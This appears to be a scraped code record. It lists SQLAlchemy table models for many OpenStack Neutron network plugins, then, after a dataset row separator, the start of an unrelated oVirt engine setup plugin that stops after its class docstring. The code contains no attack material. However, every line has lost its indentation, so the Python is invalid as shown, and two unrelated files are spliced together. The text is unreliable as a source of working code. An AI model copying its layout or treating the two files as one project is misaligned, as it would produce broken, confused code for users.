profile_type = sa.Column(sa.Enum(CISCO_CONSTANTS_NETWORK,
CISCO_CONSTANTS_POLICY,
name='profile_type'))
tenant_id = sa.Column(sa.String(36),
primary_key=True,
default=CISCO_CONSTANTS_TENANT_ID_NOT_SET,
server_default=CISCO_CONSTANTS_TENANT_ID_NOT_SET)
profile_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvTrunkSegmentBinding(BASEV2):
__tablename__ = 'cisco_n1kv_trunk_segments'
trunk_segment_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
segment_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
dot1qtag = sa.Column(sa.String(36), nullable=False, primary_key=True)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvMultiSegmentNetworkBinding(BASEV2):
__tablename__ = 'cisco_n1kv_multi_segments'
multi_segment_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
segment1_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
segment2_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
encap_profile_name = sa.Column(sa.String(36))
#neutron/plugins/cisco/db/network_models_v2.py
class QoS(BASEV2):
__tablename__ = 'cisco_qos_policies'
qos_id = sa.Column(sa.String(255))
tenant_id = sa.Column(sa.String(255), primary_key=True)
qos_name = sa.Column(sa.String(255), primary_key=True)
qos_desc = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/network_models_v2.py
class Credential(BASEV2):
__tablename__ = 'cisco_credentials'
credential_id = sa.Column(sa.String(255))
credential_name = sa.Column(sa.String(255), primary_key=True)
user_name = sa.Column(sa.String(255))
password = sa.Column(sa.String(255))
type = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/network_models_v2.py
class ProviderNetwork(BASEV2):
__tablename__ = 'cisco_provider_networks'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(255), nullable=False)
segmentation_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/cisco/db/nexus_models_v2.py
#class was renamed from NexusPortBinding to CiscoNexusPortBinding
class CiscoNexusPortBinding(BASEV2):
__tablename__ = "cisco_nexusport_bindings"
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
port_id = sa.Column(sa.String(255))
vlan_id = sa.Column(sa.Integer, nullable=False)
switch_ip = sa.Column(sa.String(255), nullable=False)
instance_id = sa.Column(sa.String(255), nullable=False)
#neutron/plugins/hyperv/model.py
#class was renamed from VlanAllocation to HyperVVlanAllocation
class HyperVVlanAllocation(BASEV2):
__tablename__ = 'hyperv_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/hyperv/model.py
#class was renamed from NetworkBinding to HyperVNetworkBinding
class HyperVNetworkBinding(BASEV2):
__tablename__ = 'hyperv_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/linuxbridge/db/l2network_models_v2.py
class NetworkState(BASEV2):
__tablename__ = 'network_states'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/linuxbridge/db/l2network_models_v2.py
class NetworkBinding(BASEV2):
__tablename__ = 'network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
physical_network = sa.Column(sa.String(64))
vlan_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/metaplugin/meta_models_v2.py
class NetworkFlavor(BASEV2):
flavor = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/metaplugin/meta_models_v2.py
class RouterFlavor(BASEV2):
flavor = sa.Column(sa.String(255))
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/ml2/drivers/brocade/db/models.py
class ML2_BrocadeNetwork(BASEV2, HasId,
HasTenant):
vlan = sa.Column(sa.String(10))
segment_id = sa.Column(sa.String(36))
network_type = sa.Column(sa.String(10))
#neutron/plugins/ml2/drivers/brocade/db/models.py
class ML2_BrocadePort(BASEV2, HasId,
HasTenant):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("ml2_brocadenetworks.id"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean, nullable=False)
physical_interface = sa.Column(sa.String(36))
vlan_id = sa.Column(sa.String(36))
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class NetworkEPG(BASEV2):
__tablename__ = 'cisco_ml2_apic_epgs'
network_id = sa.Column(sa.String(255), nullable=False, primary_key=True)
epg_id = sa.Column(sa.String(64), nullable=False)
segmentation_id = sa.Column(sa.String(64), nullable=False)
provider = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class PortProfile(BASEV2):
__tablename__ = 'cisco_ml2_apic_port_profiles'
node_id = sa.Column(sa.String(255), nullable=False, primary_key=True)
profile_id = sa.Column(sa.String(64), nullable=False)
hpselc_id = sa.Column(sa.String(64), nullable=False)
module = sa.Column(sa.String(10), nullable=False)
from_port = sa.Column(sa.Integer(), nullable=False)
to_port = sa.Column(sa.Integer(), nullable=False)
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class TenantContract(BASEV2, HasTenant):
__tablename__ = 'cisco_ml2_apic_contracts'
__table_args__ = (sa.PrimaryKeyConstraint('tenant_id'),)
contract_id = sa.Column(sa.String(64), nullable=False)
filter_id = sa.Column(sa.String(64), nullable=False)
#neutron/plugins/ml2/drivers/cisco/nexus/nexus_models_v2.py
#class was renamed from NexusPortBinding to CiscoMl2NexusPortBinding
class CiscoMl2NexusPortBinding(BASEV2):
__tablename__ = "cisco_ml2_nexusport_bindings"
binding_id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
port_id = sa.Column(sa.String(255))
vlan_id = sa.Column(sa.Integer, nullable=False)
switch_ip = sa.Column(sa.String(255))
instance_id = sa.Column(sa.String(255))
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedNets(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_nets'
network_id = sa.Column(sa.String(UUID_LEN))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedVms(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_vms'
vm_id = sa.Column(sa.String(STR_LEN))
host_id = sa.Column(sa.String(STR_LEN))
port_id = sa.Column(sa.String(UUID_LEN))
network_id = sa.Column(sa.String(UUID_LEN))
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedTenants(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_tenants'
#neutron/plugins/ml2/drivers/type_flat.py
class FlatAllocation(BASEV2):
__tablename__ = 'ml2_flat_allocations'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
#neutron/plugins/ml2/drivers/type_gre.py
class GreAllocation(BASEV2):
__tablename__ = 'ml2_gre_allocations'
gre_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/ml2/drivers/type_gre.py
class GreEndpoints(BASEV2):
__tablename__ = 'ml2_gre_endpoints'
ip_address = sa.Column(sa.String(64), primary_key=True)
#neutron/plugins/ml2/drivers/type_vlan.py
#class was renamed from VlanAllocation to Ml2VlanAllocation
class Ml2VlanAllocation(BASEV2):
__tablename__ = 'ml2_vlan_allocations'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/ml2/drivers/type_vxlan.py
class VxlanAllocation(BASEV2):
__tablename__ = 'ml2_vxlan_allocations'
vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/ml2/drivers/type_vxlan.py
class VxlanEndpoints(BASEV2):
__tablename__ = 'ml2_vxlan_endpoints'
ip_address = sa.Column(sa.String(64), primary_key=True)
udp_port = sa.Column(sa.Integer, primary_key=True, nullable=False,
autoincrement=False)
#neutron/plugins/ml2/models.py
class NetworkSegment(BASEV2, HasId):
__tablename__ = 'ml2_network_segments'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/ml2/models.py
class PortBinding(BASEV2):
__tablename__ = 'ml2_port_bindings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
host = sa.Column(sa.String(255), nullable=False, default='',
server_default='')
vnic_type = sa.Column(sa.String(64), nullable=False,
default=VNIC_NORMAL, server_default=VNIC_NORMAL)
profile = sa.Column(sa.String(BINDING_PROFILE_LEN), nullable=False,
default='', server_default='')
vif_type = sa.Column(sa.String(64), nullable=False)
vif_details = sa.Column(sa.String(4095), nullable=False, default='',
server_default='')
driver = sa.Column(sa.String(64))
segment = sa.Column(sa.String(36),
sa.ForeignKey('ml2_network_segments.id',
ondelete="SET NULL"))
port = orm.relationship(
Port,
backref=orm.backref("port_binding",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/plugins/mlnx/db/mlnx_models_v2.py
class SegmentationIdAllocation(BASEV2):
__tablename__ = 'segmentation_id_allocation'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
segmentation_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/mlnx/db/mlnx_models_v2.py
#class was renamed from NetworkBinding to MlnxNetworkBinding
class MlnxNetworkBinding(BASEV2):
__tablename__ = 'mlnx_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/mlnx/db/mlnx_models_v2.py
class PortProfileBinding(BASEV2):
__tablename__ = 'port_profile'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
vnic_type = sa.Column(sa.String(32), nullable=False)
#neutron/plugins/nec/db/models.py
class OFCId(object):
ofc_id = sa.Column(sa.String(255), unique=True, nullable=False)
#neutron/plugins/nec/db/models.py
class NeutronId(object):
neutron_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/nec/db/models.py
class OFCTenantMapping(BASEV2, NeutronId, OFCId):
"""Represents a Tenant on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCNetworkMapping(BASEV2, NeutronId, OFCId):
"""Represents a Network on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCPortMapping(BASEV2, NeutronId, OFCId):
"""Represents a Port on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCRouterMapping(BASEV2, NeutronId, OFCId):
"""Represents a router on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCFilterMapping(BASEV2, NeutronId, OFCId):
"""Represents a Filter on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class PortInfo(BASEV2):
id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
datapath_id = sa.Column(sa.String(36), nullable=False)
port_no = sa.Column(sa.Integer, nullable=False)
vlan_id = sa.Column(sa.Integer, nullable=False)
mac = sa.Column(sa.String(32), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("portinfo",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/plugins/nec/db/packetfilter.py
class PacketFilter(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False)
priority = sa.Column(sa.Integer, nullable=False)
action = sa.Column(sa.String(16), nullable=False)
in_port = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
nullable=True)
src_mac = sa.Column(sa.String(32), nullable=False)
dst_mac = sa.Column(sa.String(32), nullable=False)
eth_type = sa.Column(sa.Integer, nullable=False)
src_cidr = sa.Column(sa.String(64), nullable=False)
dst_cidr = sa.Column(sa.String(64), nullable=False)
protocol = sa.Column(sa.String(16), nullable=False)
src_port = sa.Column(sa.Integer, nullable=False)
dst_port = sa.Column(sa.Integer, nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
network = orm.relationship(
Network,
backref=orm.backref('packetfilters', lazy='joined', cascade='delete'),
uselist=False)
in_port_ref = orm.relationship(
Port,
backref=orm.backref('packetfilters', lazy='joined', cascade='delete'),
primaryjoin="Port.id==PacketFilter.in_port",
uselist=False)
#neutron/plugins/nec/db/router.py
class RouterProvider(BASEV2):
provider = sa.Column(sa.String(255))
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
router = orm.relationship(Router, uselist=False,
backref=orm.backref('provider', uselist=False,
lazy='joined',
cascade='delete'))
#neutron/plugins/nuage/nuage_models.py
class NetPartition(BASEV2, HasId):
__tablename__ = 'nuage_net_partitions'
name = sa.Column(sa.String(64))
l3dom_tmplt_id = sa.Column(sa.String(36))
l2dom_tmplt_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class NetPartitionRouter(BASEV2):
__tablename__ = "nuage_net_partition_router_mapping"
net_partition_id = sa.Column(sa.String(36),
sa.ForeignKey('nuage_net_partitions.id',
ondelete="CASCADE"),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
nuage_router_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class RouterZone(BASEV2):
__tablename__ = "nuage_router_zone_mapping"
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
nuage_zone_id = sa.Column(sa.String(36))
nuage_user_id = sa.Column(sa.String(36))
nuage_group_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class SubnetL2Domain(BASEV2):
__tablename__ = 'nuage_subnet_l2dom_mapping'
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id', ondelete="CASCADE"),
primary_key=True)
net_partition_id = sa.Column(sa.String(36),
sa.ForeignKey('nuage_net_partitions.id',
ondelete="CASCADE"))
nuage_subnet_id = sa.Column(sa.String(36))
nuage_l2dom_tmplt_id = sa.Column(sa.String(36))
nuage_user_id = sa.Column(sa.String(36))
nuage_group_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class PortVPortMapping(BASEV2):
__tablename__ = 'nuage_port_mapping'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nuage_vport_id = sa.Column(sa.String(36))
nuage_vif_id = sa.Column(sa.String(36))
static_ip = sa.Column(sa.Boolean())
#neutron/plugins/nuage/nuage_models.py
class RouterRoutesMapping(BASEV2, Route):
__tablename__ = 'nuage_routerroutes_mapping'
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True,
nullable=False)
nuage_route_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class FloatingIPPoolMapping(BASEV2):
__tablename__ = "nuage_floatingip_pool_mapping"
fip_pool_id = sa.Column(sa.String(36), primary_key=True)
net_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"))
router_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class FloatingIPMapping(BASEV2):
__tablename__ = 'nuage_floatingip_mapping'
fip_id = sa.Column(sa.String(36),
sa.ForeignKey('floatingips.id',
ondelete="CASCADE"),
primary_key=True)
router_id = sa.Column(sa.String(36))
nuage_fip_id = sa.Column(sa.String(36))
#neutron/plugins/openvswitch/ovs_models_v2.py
#class was renamed from VlanAllocation to OvsVlanAllocation
class OvsVlanAllocation(BASEV2):
__tablename__ = 'ovs_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/openvswitch/ovs_models_v2.py
class TunnelAllocation(BASEV2):
__tablename__ = 'ovs_tunnel_allocations'
tunnel_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/openvswitch/ovs_models_v2.py
#class was renamed from NetworkBinding to OvsNetworkBinding
class OvsNetworkBinding(BASEV2):
__tablename__ = 'ovs_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
# 'gre', 'vlan', 'flat', 'local'
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer) # tunnel_id or vlan_id
network = orm.relationship(
Network,
backref=orm.backref("binding", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/openvswitch/ovs_models_v2.py
class TunnelEndpoint(BASEV2):
__tablename__ = 'ovs_tunnel_endpoints'
__table_args__ = (
schema.UniqueConstraint('id', name='uniq_ovs_tunnel_endpoints0id'),
BASEV2.__table_args__,
)
ip_address = sa.Column(sa.String(64), primary_key=True)
id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/ryu/db/models_v2.py
class TunnelKeyLast(BASEV2):
last_key = sa.Column(sa.Integer, primary_key=True)
#neutron/plugins/ryu/db/models_v2.py
class TunnelKey(BASEV2):
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
tunnel_key = sa.Column(sa.Integer, primary_key=True,
nullable=False, autoincrement=False)
#neutron/plugins/vmware/dbexts/lsn_db.py
class LsnPort(BASEV2):
__tablename__ = 'lsn_port'
lsn_port_id = sa.Column(sa.String(36), primary_key=True)
lsn_id = sa.Column(sa.String(36), sa.ForeignKey('lsn.lsn_id',
ondelete="CASCADE"),
nullable=False)
sub_id = sa.Column(sa.String(36), nullable=False, unique=True)
mac_addr = sa.Column(sa.String(32), nullable=False, unique=True)
#neutron/plugins/vmware/dbexts/lsn_db.py
class Lsn(BASEV2):
__tablename__ = 'lsn'
lsn_id = sa.Column(sa.String(36), primary_key=True)
net_id = sa.Column(sa.String(36), nullable=False)
#neutron/plugins/vmware/dbexts/maclearning.py
class MacLearningState(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
mac_learning_enabled = sa.Column(sa.Boolean(), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("mac_learning_state", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/vmware/dbexts/models.py
class TzNetworkBinding(BASEV2):
__tablename__ = 'tz_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
binding_type = sa.Column(sa.Enum('flat', 'vlan', 'stt', 'gre', 'l3_ext',
name='tz_network_bindings_binding_type'),
nullable=False, primary_key=True)
phy_uuid = sa.Column(sa.String(36), primary_key=True, nullable=True)
vlan_id = sa.Column(sa.Integer, primary_key=True, nullable=True,
autoincrement=False)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxNetworkMapping(BASEV2):
__tablename__ = 'neutron_nsx_network_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'),
primary_key=True)
nsx_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxSecurityGroupMapping(BASEV2):
__tablename__ = 'neutron_nsx_security_group_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygroups.id',
ondelete="CASCADE"),
primary_key=True)
nsx_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxPortMapping(BASEV2):
__tablename__ = 'neutron_nsx_port_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nsx_switch_id = sa.Column(sa.String(36))
nsx_port_id = sa.Column(sa.String(36), nullable=False)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxRouterMapping(BASEV2):
__tablename__ = 'neutron_nsx_router_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete='CASCADE'),
primary_key=True)
nsx_id = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/models.py
class MultiProviderNetworks(BASEV2):
__tablename__ = 'multi_provider_networks'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NSXRouterExtAttributes(BASEV2):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
distributed = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
service_router = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
router = orm.relationship(
Router,
backref=orm.backref("nsx_attributes", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkConnection(BASEV2, HasTenant):
network_gateway_id = sa.Column(sa.String(36),
sa.ForeignKey('networkgateways.id',
ondelete='CASCADE'))
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'))
segmentation_type = sa.Column(
sa.Enum('flat', 'vlan',
name='networkconnections_segmentation_type'))
segmentation_id = sa.Column(sa.Integer)
__table_args__ = (sa.UniqueConstraint(network_gateway_id,
segmentation_type,
segmentation_id),)
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete='CASCADE'),
primary_key=True)
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGatewayDeviceReference(BASEV2):
id = sa.Column(sa.String(36), primary_key=True)
network_gateway_id = sa.Column(sa.String(36),
sa.ForeignKey('networkgateways.id',
ondelete='CASCADE'),
primary_key=True)
interface_name = sa.Column(sa.String(64), primary_key=True)
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGatewayDevice(BASEV2, HasId,
HasTenant):
nsx_id = sa.Column(sa.String(36))
# Optional name for the gateway device
name = sa.Column(sa.String(255))
# Transport connector type. Not using enum as range of
# connector types might vary with backend version
connector_type = sa.Column(sa.String(10))
# Transport connector IP Address
connector_ip = sa.Column(sa.String(64))
# operational status
status = sa.Column(sa.String(16))
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGateway(BASEV2, HasId,
HasTenant):
name = sa.Column(sa.String(255))
# Tenant id is nullable for this resource
tenant_id = sa.Column(sa.String(36))
default = sa.Column(sa.Boolean())
devices = orm.relationship(NetworkGatewayDeviceReference,
backref='networkgateways',
cascade='all,delete')
network_connections = orm.relationship(NetworkConnection, lazy='joined')
#neutron/plugins/vmware/dbexts/qos_db.py
class QoSQueue(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
default = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false())
min = sa.Column(sa.Integer, nullable=False)
max = sa.Column(sa.Integer, nullable=True)
qos_marking = sa.Column(sa.Enum('untrusted', 'trusted',
name='qosqueues_qos_marking'))
dscp = sa.Column(sa.Integer)
#neutron/plugins/vmware/dbexts/qos_db.py
class PortQueueMapping(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id", ondelete="CASCADE"),
primary_key=True)
queue_id = sa.Column(sa.String(36), sa.ForeignKey("qosqueues.id"),
primary_key=True)
    # Add a relationship to the Port model, adding a backref which will
    # allow SQLAlchemy to eagerly load the queue binding
port = orm.relationship(
Port,
backref=orm.backref("qos_queue", uselist=False,
cascade='delete', lazy='joined'))
#neutron/plugins/vmware/dbexts/qos_db.py
class NetworkQueueMapping(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete="CASCADE"),
primary_key=True)
queue_id = sa.Column(sa.String(36), sa.ForeignKey("qosqueues.id",
ondelete="CASCADE"))
    # Add a relationship to the Network model, adding a backref which will
    # allow SQLAlchemy to eagerly load the queue binding
network = orm.relationship(
Network,
backref=orm.backref("qos_queue", uselist=False,
cascade='delete', lazy='joined'))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsRouterBinding(BASEV2, HasStatusDescription):
__tablename__ = 'vcns_router_bindings'
# no sa.ForeignKey to routers.id because for now, a router can be removed
# from routers when delete_router is executed, but the binding is only
# removed after the Edge is deleted
router_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(16),
nullable=True)
lswitch_id = sa.Column(sa.String(36),
nullable=False)
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeFirewallRuleBinding(BASEV2):
__tablename__ = 'vcns_firewall_rule_bindings'
rule_id = sa.Column(sa.String(36),
sa.ForeignKey("firewall_rules.id"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
rule_vseid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgePoolBinding(BASEV2):
__tablename__ = 'vcns_edge_pool_bindings'
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
pool_vseid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeVipBinding(BASEV2):
__tablename__ = 'vcns_edge_vip_bindings'
vip_id = sa.Column(sa.String(36),
sa.ForeignKey("vips.id", ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36))
vip_vseid = sa.Column(sa.String(36))
app_profileid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeMonitorBinding(BASEV2):
__tablename__ = 'vcns_edge_monitor_bindings'
monitor_id = sa.Column(sa.String(36),
sa.ForeignKey("healthmonitors.id",
ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
monitor_vseid = sa.Column(sa.String(36))
#neutron/services/loadbalancer/agent_scheduler.py
class PoolLoadbalancerAgentBinding(BASEV2):
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete='CASCADE'),
primary_key=True)
agent = orm.relation(Agent)
agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id",
ondelete='CASCADE'),
nullable=False)
#neutron/services/loadbalancer/drivers/embrane/models.py
class PoolPort(BASEV2):
__tablename__ = 'embrane_pool_port'
pool_id = sa.Column(sa.String(36), sa.ForeignKey('pools.id'),
primary_key=True)
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'),
nullable=False)
#neutron/services/vpn/service_drivers/cisco_csr_db.py
class IdentifierMap(BASEV2, HasTenant):
__tablename__ = 'cisco_csr_identifier_map'
ipsec_site_conn_id = sa.Column(sa.String(64),
sa.ForeignKey('ipsec_site_connections.id',
ondelete="CASCADE"),
primary_key=True)
csr_tunnel_id = sa.Column(sa.Integer, nullable=False)
csr_ike_policy_id = sa.Column(sa.Integer, nullable=False)
csr_ipsec_policy_id = sa.Column(sa.Integer, nullable=False)
def get_metadata():
return BASEV2.metadata
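# Minimal usage sketch (the engine URL is a hypothetical example): the
# metadata gathered on BASEV2 can emit DDL for every model defined above.
#   engine = sa.create_engine('sqlite://')
#   get_metadata().create_all(engine)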
| apache-2.0 |
walteryang47/ovirt-engine | packaging/setup/plugins/ovirt-engine-setup/ovirt-engine-common/distro-rpm/packages.py | 6 | 17845 | #
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Package upgrade plugin.
"""
import datetime
import gettext
import os
import platform
from otopi import constants as otopicons
from otopi import plugin, transaction, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_setup_lib import dialog
from ovirt_engine_setup import util as osetuputil
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
"""
Package upgrade plugin.
"""
